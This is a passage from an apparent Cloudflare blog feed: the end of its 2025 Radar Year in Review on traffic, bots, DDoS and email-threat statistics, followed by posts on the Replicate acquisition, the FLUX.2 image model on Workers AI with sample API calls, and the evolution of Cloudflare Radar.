Animating the graph to see changes across the year, a number of week-over-week surges in test volume are visible. These include in the Nairobi, Kenya, area during the seven-day period ending June 10; in the Tehran, Iran, area the period ending July 29; across multiple areas in Russia the period ending August 5; and in the Karnataka, India, area the period ending October 28. It isn’t clear what drove these increases in test volume — the Cloudflare Radar Outage Center does not show any observed Internet outages impacting those areas around those times, so it is unlikely to be subscribers testing the restoration of connectivity.

^{Cloudflare speed test activity by location in 2025}

More than half of request traffic comes from mobile devices in 117 countries/regions

For better or worse, over the last quarter-century, mobile devices have become an indispensable part of everyday life. Adoption varies around the world — statistics from the World Bank show multiple countries/regions with mobile phone ownership above 90%, while in several others, ownership rates are below 10%, as of October 2025. In some countries/regions, mobile devices primarily connect to the Internet via Wi-Fi, while other countries/regions are “mobile first,” where 4G/5G services are the primary means of Internet access.

Information contained within the User-Agent header included with each request to Cloudflare enables us to categorize it as coming from a mobile, desktop, or other type of device. Aggregating this categorization globally across 2025 found that 43% of requests were from mobile devices, up from 41% in 2024. The balance came from “classic” laptop and desktop type devices. Similar to an observation made last year, these traffic shares were in line with those measured in Year in Review reports dating back to 2022, suggesting that mobile device usage has achieved a “steady state.”

In 117 countries/regions, more than half of requests came from mobile devices, led by Sudan and Malawi at 75% and 74% respectively. Five other African countries/regions — Eswatini (Swaziland), Yemen, Botswana, Mozambique, and Somalia — also had mobile request shares above 70% in 2025, in line with strong mobile phone ownership in the region. Among countries/regions with low mobile device traffic share, Gibraltar was the only one below 10% (at 5.1%), with just six others originating less than a quarter of requests from mobile devices. This is fewer than in 2024, when a dozen countries/regions had a mobile share below 25%.

^{Distribution of traffic by device type in 2025, worldwide}

^{Global distribution of traffic by device type in 2025}

Security

6% of global traffic over Cloudflare’s network was mitigated by our systems — either as potentially malicious or for customer-defined reasons

Cloudflare automatically mitigates attack traffic targeting customer websites and applications using DDoS mitigation techniques or Web Application Firewall (WAF) Managed Rules, protecting them from a variety of threats posed by malicious actors. We also enable customers to mitigate traffic, even if it isn’t malicious, using techniques like rate-limiting requests or blocking all traffic from a given location. The need to do so may be driven by regulatory or business requirements. We looked at the overall share of traffic to Cloudflare’s network throughout 2025 that was mitigated for any reason, as well as the share that was blocked as a DDoS attack or by WAF Managed Rules.

This year, 6.2% of global traffic was mitigated, down a quarter of a percentage point from 2024. 3.3% of traffic was mitigated as a DDoS attack, or by managed rules, up one-tenth of a percentage point year over year. General mitigations were applied to more than 10% of the traffic coming from over 30 countries/regions, while 14 countries/regions had DDoS/WAF mitigations applied to more than 10% of originated traffic. Both counts were down in comparison to 2024.

Equatorial Guinea had the largest shares of mitigated traffic with 40% generally mitigated and 29% with DDoS/WAF mitigations applied. These shares grew over the last year, from 26% (general) and 19% (DDoS/WAF). In contrast, Dominica had the smallest shares of mitigated traffic, with just 0.7% of traffic mitigated, with DDoS/WAF mitigations applied to just 0.1%.

The large increase in mitigated traffic seen during July in the graph below is due to a very large DDoS attack campaign that primarily targeted a single Cloudflare customer domain.

^{Mitigated traffic trends in 2025, worldwide}

40% of global bot traffic came from the United States, with Amazon Web Services and Google Cloud originating a quarter of global bot traffic

A bot is a software application programmed to do certain tasks, and Cloudflare uses advanced heuristics to differentiate between bot traffic and human traffic, scoring each request on the likelihood that it originates from a bot or a human user. By monitoring traffic suspected to be from bots, site and application owners can spot and, if necessary, block potentially malicious activity. However, not all bots are malicious — bots can also be helpful, and Cloudflare maintains a directory of verified bots that includes those used for things like search engine indexing, security scanning, and site/application monitoring. Regardless of intent, we analyzed where bot traffic was originating from in 2025, using the IP address of a request to identify the network (autonomous system) and country/region associated with the bot making the request.

Globally, the top 10 countries/regions accounted for 71% of observed bot traffic. Forty percent originated from the United States, far ahead of Germany’s 6.5% share. The US share was up over five percentage points from 2024, while Germany’s share was down a fraction of a percentage point. The remaining countries in the top 10 all contributed bot traffic shares below 5% in 2025.

^{Global bot traffic distribution by source country/region in 2025}

Looking at bot traffic by network, we found that cloud platforms remained among the leading sources. This is due to a number of factors, including the ease of using automated tools to quickly provision compute resources, their relatively low cost, their broadly distributed geographic footprints, and the platforms’ high-bandwidth Internet connectivity.

Two autonomous systems associated with Amazon Web Services accounted for a total of 14.4% of observed bot traffic, and two associated with Google Cloud were responsible for a combined 9.7% of bot traffic. They were followed by Microsoft Azure, which originated 5.5% of bot traffic. The shares from all three platforms were up as compared to 2024. These cloud platforms have a strong regional data center presence in many of the countries/regions in the top 10. Elsewhere, around the world, local telecommunications providers frequently accounted for the largest shares of automated bot traffic observed in those countries/regions.

^{Global bot traffic distribution by source network in 2025}

Organizations in the "People and Society” vertical were the most targeted during 2025

Attackers are constantly shifting their tactics and targets, mixing things up in an attempt to evade detection, or based on the damage they intend to cause. They may try to cause financial harm to businesses by targeting ecommerce sites during a busy shopping period, make a political statement by attacking government-related or civil society sites, or attempt to knock opponents offline by attacking a game server. To identify vertical-targeted attack activity during 2025, we analyzed mitigated traffic for customers that had an associated industry and vertical within their customer record. Mitigated traffic was aggregated weekly by source country/region across 17 target verticals.

Organizations in the "People and Society” vertical were the most targeted across the year, with 4.4% of global mitigated traffic targeting the vertical. Customers classified as “People and Society” include religious institutions, nonprofit organizations, civic & social organizations, and libraries. The vertical started out the year with under 2% of mitigated traffic, but saw the share jump to 10% the week of March 5, and increase to over 17% by the end of the month. Other attack surges targeting these sites occurred in late April (to 19.1%) and early July (to 23.2%). Many of these types of organizations are protected by Cloudflare’s Project Galileo, and this blog post details the attacks and threats they experienced in 2024 and 2025.

Gambling/Games, the most-targeted vertical last year, saw its share of mitigated attacks drop by more than half year-over-year, to just 2.6%. While one might expect to see attacks targeting gambling sites peak around major sporting events like the Super Bowl and March Madness, such a trend was not evident, as attack share peaked at 6.5% the week of March 5 — a month after the Super Bowl, and a couple of weeks before the start of March Madness.

^{Global mitigated traffic share by vertical in 2025, summary view}

Routing security, measured as the shares of RPKI valid routes and covered IP address space, saw continued improvement throughout 2025

Border Gateway Protocol (BGP) is the Internet’s core routing protocol, enabling traffic to flow between source and destination by communicating routes between networks. However, because it relies on trust between connected networks, incorrect information shared between peers (intentionally or not) can send traffic to the wrong place — potentially to systems under control of an attacker. To address this, Resource Public Key Infrastructure (RPKI) was developed as a cryptographic method of signing records that associate a BGP route announcement with the correct originating autonomous system (AS) number to ensure that the information being shared originally came from a network that is allowed to do so. Cloudflare has been a vocal advocate for routing security, including as a founding participant in the MANRS CDN and Cloud Programme and by providing a public tool that enables users to test whether their Internet provider has implemented BGP safely.

We analyzed data available on Cloudflare Radar’s Routing page to determine the share of RPKI valid routes and how that share changed throughout 2025, as well as determining the share of IP address space covered by valid routes. The latter metric is noteworthy because a route announcement covering a large amount of IP address space (millions of IPv4 addresses) has a greater potential impact than an announcement covering a small block of IP address space (hundreds of IPv4 addresses).

We started 2025 with 50% valid IPv4 routes, growing to 53.9% by December 2. The share of valid IPv6 routes increased to 60.1%, up 4.7 percentage points. Looking at the global share of IP address space covered by valid routes, IPv4 increased to 48.5%, a three percentage point increase. The share of IPv6 address space covered by valid routes fell slightly to 61.6%. Although the year-over-year changes for these metrics are slowing, we have made significant progress over the last five years. Since the start of 2020, the share of RPKI valid IPv4 routes and IPv4 address space have both grown by approximately 3x.

^{Shares of global RPKI valid routing entries by IP version in 2025}

^{Shares of globally announced IP address space covered by RPKI valid routes in 2025}

Barbados saw the biggest growth in the share of valid IPv4 routes, growing from 2.2% to 20.8%. Looking at valid IPv6 routes, Mali saw the most significant share growth in 2025, from 10.0% to 58.3%.

Barbados also experienced the biggest increase in the share of IPv4 space covered by valid routes, jumping from just 2.0% to 18.6%. For IPv6 address space, both Tajikistan and Dominica went from having effectively no space covered by valid routes at the start of the year, to 5.5% and 3.5% respectively.

Hyper-volumetric DDoS attack sizes grew significantly throughout the year

In our quarterly DDoS Report series (Q1, Q2, Q3), we have highlighted the increasing frequency and size of hyper-volumetric network layer attacks targeting Cloudflare customers and Cloudflare’s infrastructure. We define a “hyper-volumetric network layer attack” as one that operates at Layer 3/4 and that peaks at more than one terabit per second (1 Tbps) or more than one billion packets per second (1 Bpps). These reports provide a quarterly perspective, but we also wanted to show a view of activity across the year to understand when attackers are most active, and how attack sizes have grown over time.

Looking at hyper-volumetric attack activity in 2025 from a Tbps perspective, July saw the largest number of such attacks, at over 500, while February saw the fewest, at just over 150. Attack intensity remained generally below 5 Tbps, although a 10 Tbps attack blocked at the end of August was a harbinger of things to come. This attack was the first of a campaign of >10 Tbps attacks that took place during the first week of September, ahead of a series of >20 Tbps attacks during the last week of the month. In early October, multiple increasingly larger hyper-volumetric attacks were observed, with the largest for the month peaking at 29.7 Tbps. However, that record was soon eclipsed, as an early November attack reached 31.4 Tbps.

From a Bpps perspective, hyper-volumetric attack activity was much lower, with November experiencing the most (over 140), while just three were seen in February and June. Attack intensity across the year generally remained below 4 Bpps through late August, though a succession of increasingly larger attacks were seen over the next several months, peaking in October. Although the intensity of most of the 110+ attacks blocked in October was below 5 Bpps, a 14 Bpps attack seen during the month was the largest hyper-volumetric attack by packets per second blocked during the year, besting five other successive record-setting attacks that occurred in September.

^{Peak DDoS attack sizes in 2025}

Email security

More than 5% of email messages analyzed by Cloudflare were found to be malicious

Recent statistics suggest that email remains the top communication channel for external business contact, despite the growing enterprise use of collaboration/messaging apps. Given its broad enterprise usage, attackers still find it to be an attractive entry point into corporate networks. Generative AI tools make it easier to craft highly targeted malicious emails that convincingly impersonate trusted brands or legitimate senders (like corporate executives) but contain deceptive links, dangerous attachments, or other types of threats. Cloudflare Email Security protects customers from email-based attacks, including those carried out through targeted malicious email messages.

In 2025, an average of 5.6% of emails analyzed by Cloudflare were found to be malicious. The share of messages processed by Cloudflare Email Security that were found to be malicious generally ranged between 4% and 6% throughout most of the year. Our data shows a jump in malicious email share starting in October, likely due to an improved classification system implemented by Cloudflare Email Security.

^{Global malicious email share trends in 2025}

Deceptive links, identity deception, and brand impersonation were the most common types of threats found in malicious email messages

Deceptive links were the top malicious email threat category in 2025, found in 52% of messages, up from 43% in 2024. Since the display text for a hyperlink in HTML can be arbitrarily set, attackers can make a URL appear as if it links to a benign site when, in fact, it is actually linking to a malicious resource that can be used to steal login credentials or download malware. The share of processed emails containing deceptive links was as high as 70% in late April, and again in mid-November.

Identity deception occurs when an attacker sends an email claiming to be someone else. They may do this using domains that look similar, are spoofed, or use display name tricks to appear to be coming from a trusted domain. Brand impersonation is a form of identity deception where an attacker sends a phishing message that impersonates a recognizable company or brand. Brand impersonation may also use display name spoofing or domain impersonation. Identity deception (38%) and brand impersonation (32%) were growing threats in 2025, up from 35% and 23% respectively in 2024. Both saw an increase in mid-November.

^{Email threat category trends in 2025, worldwide}

Nearly all of the email messages from the .christmas and .lol Top Level Domains were found to be either spam or malicious

In addition to providing traffic, geographic distribution, and digital certificate insights for Top Level Domains (TLDs) like .com or .us, Cloudflare Radar also provides insights into the “most abused” TLDs – those with domains that we have found are originating the largest shares of malicious and spam email among messages analyzed by Cloudflare Email Security. The analysis is based on the sending domain’s TLD, found in the From: header of an email message. For example, if a message came from sender@example.com, then example.com is the sending domain, and .com is the associated TLD. For the Year in Review analysis, we only included TLDs from which we saw an average minimum of 30 messages per hour.

Based on messages analyzed throughout 2025, we found that .christmas and .lol were the most abused TLDs, with 99.8% and 99.6% of messages from these TLDs respectively characterized as either spam or malicious. Sorting the list of TLDs by malicious email share, .cfd and .sbs both had more than 90% of analyzed emails categorized as malicious. The .best TLD was the worst in terms of spam email share, with 69% of email messages characterized as spam.

^{TLDs originating the largest total shares of malicious and spam email in 2025}

Conclusion

Although the Internet and the Web continue to evolve and change over time, it appears that some of the key metrics have become fairly stable. However, we expect that others, such as those metrics tracking AI trends, will shift over the coming years as that space evolves at a rapid pace.

We encourage you to visit the Cloudflare Radar 2025 Year In Review microsite and explore the trends for your country/region, and consider how they impact your organization as you plan for 2026. You can also get near real-time insight into many of these metrics and trends on Cloudflare Radar. And as noted above, for insights into the top Internet services across multiple industry categories and countries/regions, we encourage you to read the companion Year in Review blog post.

If you have any questions, you can contact the Cloudflare Radar team at radar@cloudflare.com or on social media at @CloudflareRadar (X), https://noc.social/@cloudflareradar (Mastodon), and radar.cloudflare.com (Bluesky).

Acknowledgements

As the saying goes, it takes a village to make our annual Year in Review happen, from aggregating and analyzing the data, to creating the microsite, to developing associated content. I’d like to acknowledge those team members that contributed to this year’s effort, with thanks going out to: Jorge Pacheco, Sabina Zejnilovic, Carlos Azevedo, Mingwei Zhang, Sofia Cardita (data analysis); André Páscoa, Nuno Pereira (frontend development); João Tomé (Most Popular Internet Services); David Fidalgo, Janet Villarreal, and the internationalization team (translations); Jackie Dutton, Kari Linder, Guille Lasarte (Communications); Laurel Wamsley (blog editing); and Paula Tavares (Engineering Management), as well as other colleagues across Cloudflare for their support and assistance.

Why Replicate is joining Cloudflare

Andreas Jansson — Mon, 01 Dec 2025 06:00:00 GMT

We're happy to announce that as of today Replicate is officially part of Cloudflare.

When we started Replicate in 2019, OpenAI had just open sourced GPT-2, and few people outside of the machine learning community paid much attention to AI. But for those of us in the field, it felt like something big was about to happen. Remarkable models were being created in academic labs, but you needed a metaphorical lab coat to be able to run them.

We made it our mission to get research models out of the lab into the hands of developers. We wanted programmers to creatively bend and twist these models into products that the researchers would never have thought of.

We approached this as a tooling problem. Just like tools like Heroku made it possible to run websites without managing web servers, we wanted to build tools for running models without having to understand backpropagation or deal with CUDA errors.

The first tool we built was Cog: a standard packaging format for machine learning models. Then we built Replicate as the platform to run Cog models as API endpoints in the cloud. We abstracted away both the low-level machine learning, and the complicated GPU cluster management you need to run inference at scale.

It turns out the timing was just right. When Stable Diffusion was released in 2022 we had mature infrastructure that could handle the massive developer interest in running these models. A ton of fantastic apps and products were built on Replicate, apps that often ran a single model packaged in a slick UI to solve a particular use case.

Since then, AI Engineering has matured into a serious craft. AI apps are no longer just about running models. The modern AI stack has model inference, but also microservices, content delivery, object storage, caching, databases, telemetry, etc. We see many of our customers building complex heterogenous stacks where the Replicate models are one part of a higher-order system across several platforms.

This is why we’re joining Cloudflare. Replicate has the tools and primitives for running models. Cloudflare has the best network, Workers, R2, Durable Objects, and all the other primitives you need to build a full AI stack.

The AI stack lives entirely on the network. Models run on data center GPUs and are glued together by small cloud functions that call out to vector databases, fetch objects from blob storage, call MCP servers, etc. “The network is the computer” has never been more true.

At Cloudflare, we’ll now be able to build the AI infrastructure layer we have dreamed of since we started. We’ll be able to do things like run fast models on the edge, run model pipelines on instantly-booting Workers, stream model inputs and outputs with WebRTC, etc.

We’re proud of what we’ve built at Replicate. We were the first generative AI serving platform, and we defined the abstractions and design patterns that most of our peers have adopted. We’ve grown a wonderful community of builders and researchers around our product.

Partnering with Black Forest Labs to bring FLUX.2 [dev] to Workers AI

Michelle Chen — Tue, 25 Nov 2025 00:00:00 GMT

In recent months, we’ve seen a leap forward for closed-source image generation models with the rise of Google’s Nano Banana and OpenAI image generation models. Today, we’re happy to share that a new open-weight contender is back with the launch of Black Forest Lab’s FLUX.2 [dev] and available to run on Cloudflare’s inference platform, Workers AI. You can read more about this new model in detail on BFL’s blog post about their new model launch here.

We have been huge fans of Black Forest Lab’s FLUX image models since their earliest versions. Our hosted version of FLUX.1 [schnell] is one of the most popular models in our catalog for its photorealistic outputs and high-fidelity generations. When the time came to host the licensed version of their new model, we jumped at the opportunity. The FLUX.2 model takes all the best features of FLUX.1 and amps it up, generating even more realistic, grounded images with added customization support like JSON prompting.

Our Workers AI hosted version of FLUX.2 has some specific patterns, like using multipart form data to support input images (up to 4 512x512 images), and output images up to 4 megapixels. The multipart form data format allows users to send us multiple image inputs alongside the typical model parameters. Check out our developer docs changelog announcement to understand how to use the FLUX.2 model.

What makes FLUX.2 special? Physical world grounding, digital world assets, and multi-language support

The FLUX.2 model has a more robust understanding of the physical world, allowing you to turn abstract concepts into photorealistic reality. It excels at generating realistic image details and consistently delivers accurate hands, faces, fabrics, logos, and small objects that are often missed by other models. Its knowledge of the physical world also generates life-like lighting, angles and depth perception.

^{Figure 1. Image generated with FLUX.2 featuring accurate lighting, shadows, reflections and depth perception at a café in Paris.}

This high-fidelity output makes it ideal for applications requiring superior image quality, such as creative photography, e-commerce product shots, marketing visuals, and interior design. Because it can understand context, tone, and trends, the model allows you to create engaging and editorial-quality digital assets from short prompts.

Aside from the physical world, the model is also able to generate high-quality digital assets such as designing landing pages or generating detailed infographics (see below for example). It’s also able to understand multiple languages naturally, so combining these two features – we can get a beautiful landing page in French from a French prompt.

Générer une page web visuellement immersive pour un service de promenade de chiens. L'image principale doit dominer l'écran, montrant un chien exubérant courant dans un parc ensoleillé, avec des touches de vert vif (#2ECC71) intégrées subtilement dans le feuillage ou les accessoires du chien. Minimiser le texte pour un impact visuel maximal.

Character consistency – solving for stochastic drift

FLUX.2 offers multi-reference editing with state-of-the-art character consistency, ensuring identities, products, and styles remain consistent for tasks. In the world of generative AI, getting a high-quality image is easy. However, getting the exact same character or product twice has always been the hard part. This is a phenomenon known as "stochastic drift", where generated images drift away from the original source material.

^{Figure 2. Stochastic drift infographic (generated on FLUX.2)}

One of FLUX.2’s breakthroughs is multi-reference image inputs designed to solve this consistency challenge. You’ll have the ability to change the background, lighting, or pose of an image without accidentally changing the face of your model or the design of your product. You can also reference other images or combine multiple images together to create something new.

In code, Workers AI supports multi-reference images (up to 4) with a multipart form-data upload. The image inputs are binary images and output is a base64 encoded image:

curl --request POST \
  --url 'https://api.cloudflare.com/client/v4/accounts/{ACCOUNT}/ai/run/@cf/black-forest-labs/flux-2-dev' \
  --header 'Authorization: Bearer {TOKEN}' \
  --header 'Content-Type: multipart/form-data' \
  --form 'prompt=take the subject of image 2 and style it like image 1' \
  --form input_image_0=@/Users/johndoe/Desktop/icedoutkeanu.png \
  --form input_image_1=@/Users/johndoe/Desktop/me.png \
  --form steps=25
  --form width=1024
  --form height=1024

We also support this through the Workers AI Binding:

const image = await fetch("http://image-url");
const form = new FormData();
 
const image_blob = await streamToBlob(image.body, "image/png");
form.append('input_image_0', image_blob)
form.append('prompt', 'a sunset with the dog in the original image')
 
const resp = await env.AI.run("@cf/black-forest-labs/flux-2-dev", {
    multipart: {
        body: form,
        contentType: "multipart/form-data"
    }
})

Built for real world use cases

The newest image model signifies a shift towards functional business use cases, moving beyond simple image quality improvements. FLUX.2 enables you to:

Create Ad Variations: Generate 50 different advertisements using the exact same actor, without their face morphing between frames.
Trust Your Product Shots: Drop your product on a model, or into a beach scene, a city street, or a studio table. The environment changes, but your product stays accurate.
Build Dynamic Editorials: Produce a full fashion spread where the model looks identical in every single shot, regardless of the angle.

^{Figure 3. Combining the oversized hoodie and sweatpant ad photo (generated with FLUX.2) with Cloudflare’s logo to create product renderings with consistent faces, fabrics, and scenery. **}^{Note: we prompted for white Cloudflare font as well instead of the original black font.}

Granular controls — JSON prompting, HEX codes and more!

The FLUX.2 model makes another advancement by allowing users to control small details in images through tools like JSON prompting and specifying specific hex codes.

For example, you could send this JSON as a prompt (as part of the multipart form input) and the resulting image follows the prompt exactly:

{
  "scene": "A bustling, neon-lit futuristic street market on an alien planet, rain slicking the metal ground",
  "subjects": [
    {
      "type": "Cyberpunk bounty hunter",
      "description": "Female, wearing black matte armor with glowing blue trim, holding a deactivated energy rifle, helmet under her arm, rain dripping off her synthetic hair",
      "pose": "Standing with a casual but watchful stance, leaning slightly against a glowing vendor stall",
      "position": "foreground"
    },
    {
      "type": "Merchant bot",
      "description": "Small, rusted, three-legged drone with multiple blinking red optical sensors, selling glowing synthetic fruit from a tray attached to its chassis",
      "pose": "Hovering slightly, offering an item to the viewer",
      "position": "midground"
    }
  ],
  "style": "noir sci-fi digital painting",
  "color_palette": [
    "deep indigo",
    "electric blue",
    "acid green"
  ],
  "lighting": "Low-key, dramatic, with primary light sources coming from neon signs and street lamps reflecting off wet surfaces",
  "mood": "Gritty, tense, and atmospheric",
  "background": "Towering, dark skyscrapers disappearing into the fog, with advertisements scrolling across their surfaces, flying vehicles (spinners) visible in the distance",
  "composition": "dynamic off-center",
  "camera": {
    "angle": "eye level",
    "distance": "medium close-up",
    "focus": "sharp on subject",
    "lens": "35mm",
    "f-number": "f/1.4",
    "ISO": 400
  },
  "effects": [
    "heavy rain effect",
    "subtle film grain",
    "neon light reflections",
    "mild chromatic aberration"
  ]
}

To take it further, we can ask the model to recolor the accent lighting to a Cloudflare orange by giving it a specific hex code like #F48120.

Try it out today!

The newest FLUX.2 [dev] model is now available on Workers AI — you can get started with the model through our developer docs or test it out on our multimodal playground.

Replicate is joining Cloudflare

Rita Kozlov — Mon, 17 Nov 2025 14:00:00 GMT

We have some big news to share today: Replicate, the leading platform for running AI models, is joining Cloudflare.

We first started talking to Replicate because we shared a lot in common beyond just a passion for bright color palettes. Our mission for Cloudflare’s Workers developer platform has been to make building and deploying full-stack applications as easy as possible. Meanwhile, Replicate has been on a similar mission to make deploying AI models as easy as writing a single line of code. And we realized we could build something even better together by integrating the Replicate platform into Cloudflare directly.

We are excited to share this news and even more excited for what it will mean for customers. Bringing Replicate’s tools into Cloudflare will continue to make our Developer Platform the best place on the Internet to build and deploy any AI or agentic workflow.

What does this mean for you?

Before we spend more time talking about the future of AI, we want to answer the questions that are top of mind for Replicate and Cloudflare users. In short:

For existing Replicate users: Your APIs and workflows will continue to work without interruption. You will soon benefit from the added performance and reliability of Cloudflare's global network.

For existing Workers AI users: Get ready for a massive expansion of the model catalog and the new ability to run fine-tunes and custom models directly on Workers AI.

Now – let’s get back into why we’re so excited about our joint future.

The AI Revolution was not televised, but it started with open source

Before AI was AI, and the subject of every conversation, it was known for decades as “machine learning”. It was a specialized, almost academic field. Progress was steady but siloed, with breakthroughs happening inside a few large, well-funded research labs. The models were monolithic, the data was proprietary, and the tools were inaccessible to most developers. Everything changed when the culture of open-source collaboration — the same force that built the modern Internet — collided with machine learning, as researchers and companies began publishing not just their papers, but their model weights and code.

This ignited an incredible explosion of innovation. The pace of change in just the past few years has been staggering; what was state-of-the-art 18 months ago (or sometimes it feels like just days ago) is now the baseline. This acceleration is most visible in generative AI.

We went from uncanny, blurry curiosities to photorealistic image generation in what felt like the blink of an eye. Open source models like Stable Diffusion unlocked immediate creativity for developers, and that was just the beginning. If you take a look at Replicate’s model catalog today, you’ll see thousands of image models of almost every flavor, each iterating on the previous.

This happened not just with image models, but video, audio, language models and more….

But this incredible, community-driven progress creates a massive practical challenge: How do you actually run these models? Every new model has different dependencies, requires specific GPU hardware (and enough of it), and needs a complex serving infrastructure to scale. Developers found themselves spending more time fighting with CUDA drivers and requirements.txt files than actually building their applications.

This is exactly the problem Replicate solved. They built a platform that abstracts away all that complexity (using their open-source tool Cog to package models into standard, reproducible containers), letting any developer or data scientist run even the most complex open-source models with a simple API call.

Today, Replicate’s catalog spans more than 50,000 open-source models and fine-tuned models. While open source unlocked so many possibilities, Replicate’s toolset goes beyond that to make it possible for developers to access any models they need in one place. Period. With their marketplace, they also offer seamless access to leading proprietary models like GPT-5 and Claude Sonnet, all through the same unified API.

What’s worth noting is that Replicate didn't just build an inference service; they built a community. So much innovation happens through being inspired by what others are doing, iterating on it, and making it better. Replicate has become the definitive hub for developers to discover, share, fine-tune, and experiment with the latest models in a public playground.

Stronger together: the AI catalog meets the AI cloud

Coming back to the Workers Platform mission: Our goal all along has been to enable developers to build full-stack applications without having to burden themselves with infrastructure. And while that hasn’t changed, AI has changed the requirements of applications.

The types of applications developers are building are changing — three years ago, no one was building agents or creating AI-generated launch videos. Today they are. As a result, what they need and expect from the cloud, or the AI cloud, has changed too.

To meet the needs of developers, Cloudflare has been building the foundational pillars of the AI Cloud, designed to run inference at the edge, close to users. This isn't just one product, but an entire stack:

Workers AI: Serverless GPU inference on our global network.
AI Gateway: A control plane for caching, rate-limiting, and observing any AI API.
Data Stack: Including Vectorize (our vector database) and R2 (for model and data storage).
Orchestration: Tools like AI Search (formerly Autorag), Agents, and Workflows to build complex, multi-step applications.
Foundation: All built on our core developer platform of Workers, Durable Objects, and the rest of our stack.

As we’ve been helping developers scale up their applications, Replicate has been on a similar mission — to make deploying AI models as easy as deploying code. This is where it all comes together. Replicate brings one of the industry's largest and most vibrant model catalog and developer community. Cloudflare brings an incredibly performant global network and serverless inference platform. Together, we can deliver the best of both worlds: the most comprehensive selection of models, runnable on a fast, reliable, and affordable inference platform.

Our shared vision

For the community: the hub for AI exploration

The ability to share models, publish fine-tunes, collect stars, and experiment in the playground is the heart of the Replicate community. We will continue to invest in and grow this as the premier destination for AI discovery and experimentation, now supercharged by Cloudflare's global network for an even faster, more responsive experience for everyone.

The future of inference: one platform, all models

Our vision is to bring the best of both platforms together. We will bring the entire Replicate catalog — all 50,000+ models and fine-tunes — to Workers AI. This gives you the ultimate choice: run models in Replicate's flexible environment or on Cloudflare's serverless platform, all from one place.

But we're not just expanding the catalog. We are thrilled to announce that we will be bringing fine-tuning capabilities to Workers AI, powered by Replicate's deep expertise. We are also making Workers AI more flexible than ever. Soon, you'll be able to bring your own custom models to our network. We'll leverage Replicate's expertise with Cog to make this process seamless, reproducible, and easy.

The AI Cloud: more than just inference

Running a model is just one piece of the puzzle. The real magic happens when you connect AI to your entire application. Imagine what you can build when Replicate's massive catalog is deeply integrated with the entire Cloudflare developer platform: run a model and store the results directly in R2 or Vectorize; trigger inference from a Worker or Queue; use Durable Objects to manage state for an AI agent; or build real-time generative UI with WebRTC and WebSockets.

To manage all this, we will integrate our unified inference platform deeply with the AI Gateway, giving you a single control plane for observability, prompt management, A/B testing, and cost analytics across all your models, whether they're running on Cloudflare, Replicate, or any other provider.

Welcome to the team!

We are incredibly excited to welcome the Replicate team to Cloudflare. Their passion for the developer community and their expertise in the AI ecosystem are unmatched. We can't wait to build the future of AI together.

Making the Internet observable: the evolution of Cloudflare Radar

David Belson — Mon, 27 Oct 2025 12:00:00 GMT

The Internet is constantly changing in ways that are difficult to see. How do we measure its health, spot new threats, and track the adoption of new technologies? When we launched Cloudflare Radar in 2020, our goal was to illuminate the Internet's patterns, helping anyone understand what was happening from a security, performance, and usage perspective, based on aggregated data from Cloudflare services. From the start, Internet measurement, transparency, and resilience has been at the core of our mission.

The launch blog post noted, “There are three key components that we’re launching today: Radar Internet Insights, Radar Domain Insights and Radar IP Insights.” These components have remained at the core of Radar, and they have been continuously expanded and complemented by other data sets and capabilities to support that mission. By shining a brighter light on Internet security, routing, traffic disruptions, protocol adoption, DNS, and now AI, Cloudflare Radar has become an increasingly comprehensive source of information and insights. And despite our expanding scope, we’ve focused on maintaining Radar’s “easy access” by evolving our information architecture, making our search capabilities more powerful, and building everything on top of a powerful, publicly-accessible API.

Now more than ever, Internet observability matters. New protocols and use cases compete with new security threats. Connectivity is threatened not only by errant construction equipment, but also by governments practicing targeted content blocking. Cloudflare Radar is uniquely positioned to provide actionable visibility into these trends, threats, and events with local, network, and global level insights, spanning multiple data sets. Below, we explore some highlights of Radar’s evolution over the five years since its launch, looking at how Cloudflare Radar is building one of the industry’s most comprehensive views of what is happening on the Internet.

Making Internet security more transparent

The Cloudflare Research team takes a practical approach to research, tackling projects that have the potential to make a big impact. A number of these projects have been in the security space, and for three of them, we’ve collaborated to bring associated data sets to Radar, highlighting the impact of these projects.

The 2025 launch of the Certificate Transparency (CT) section on Radar was the culmination of several months of collaborative work to expand visibility into key metrics for the Certificate Transparency ecosystem, enabling us to deprecate the original Merkle Town CT dashboard, which was launched in 2018. Digital certificates are the foundation of trust on the modern Internet, and Certificate Authorities (CAs) serve as trusted gatekeepers, issuing those certificates, with CT logs providing a public, auditable record of every certificate issued, making it possible to detect fraudulent or mis-issued certificates. The information available in the new CT section allows users to explore information about these certificates and CAs, as well as about the CT logs that capture information about every issued certificate.

In 2024, members of Cloudflare’s Research team collaborated with outside researchers to publish a paper titled “Global, Passive Detection of Connection Tampering”. Among the findings presented in the paper, it noted that globally, about 20% of all connections to Cloudflare close unexpectedly before any useful data exchange occurs. This unexpected closure is consistent with connection tampering by a third party, which may occur, for instance, when repressive governments seek to block access to websites or applications. Working with the Research team, we added visibility into TCP resets and timeouts to the Network Layer Security page on Radar. This graph, such as the example below for Turkmenistan, provides a perspective on potential connection tampering activity globally, and at a country level. Changes and trends visible in this graph can be used to corroborate reports of content blocking and other local restrictions on Internet connectivity.

The research team has been working on post-quantum encryption since 2017, racing improvements in quantum computing to help ensure that today’s encrypted data and communications are resistant to being decrypted in the future. They have led the drive to incorporate post-quantum encryption across Cloudflare’s infrastructure and services, and in 2023 we announced that it would be included in our delivery services, available to everyone and free of charge, forever. However, to take full advantage, support is needed on the client side as well, so to track that, we worked together to add a graph to Radar’s Adoption & Usage page that tracks the post-quantum encrypted share of HTTPS request traffic. Starting 2024 at under 3%, it has grown to just over 47%, thanks to major browsers and code libraries activating post-quantum support by default.

Measuring AI bot & crawler activity

The rapid proliferation and growth of AI platforms since the launch of OpenAI’s ChatGPT in November 2022 has upended multiple industries. This is especially true for content creators. Over the last several decades, they generally allowed their sites to be crawled in exchange for the traffic that the search engines would send back to them — traffic that could be monetized in various ways. However, two developments have changed this dynamic. First, AI platforms began aggressively crawling these sites to vacuum up content to use for training their models (with no compensation to content creators). Second, search engines have evolved into answer engines, drastically reducing the amount of traffic they send back to sites. This has led content owners to demand solutions.

Among these solutions is providing customers with increased visibility into how frequently AI crawlers are scraping their content, and Radar has built on that to provide aggregated perspectives on this activity. Radar’s AI Insights page provides graphs based on crawling traffic, including traffic trends by bot and traffic trends by crawl purpose, both of which can be broken out by industry set as well. Customers can compare the traffic trends we show on the dashboard with trends across their industry.

One key insight is the crawl-to-refer ratio: a measure of how many HTML pages a crawler consumes in comparison to the number of page visits that they refer back to the crawled site. A view into these ratios by platform, and how they change over time, gives content creators insight into just how significant the reciprocal traffic imbalances are, and the impact of the ongoing transition of search engines into answer engines.

